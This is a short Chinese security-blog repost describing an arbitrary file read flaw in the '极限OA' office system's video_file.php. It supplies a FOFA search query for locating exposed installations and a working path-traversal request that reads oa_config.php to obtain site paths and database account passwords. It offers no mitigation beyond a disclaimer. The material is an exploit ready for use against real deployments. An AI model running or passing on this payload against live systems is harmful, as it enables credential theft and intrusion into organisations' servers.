本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 极限OA video_file.php 任意文件读取漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
极限OA网络智能办公系统代表先进的协同管理理念,采用领先的B/S方式,实现全球化远程办公和移动办公,是中国用户群最广泛的OA软件平台,企事业网络办公,远程办公,电子政务的首选。极限OA video_file.php处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
![图片[1]-极限OA video_file.php 任意文件读取漏洞-安全小天地](https://img.godyu.com/2023/12/20231226125535491.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
fofa:icon_hash=”1967132225″
1.执行POC得到路径,数据库账户密码等信息
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php![图片[2]-极限OA video_file.php 任意文件读取漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205536333.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容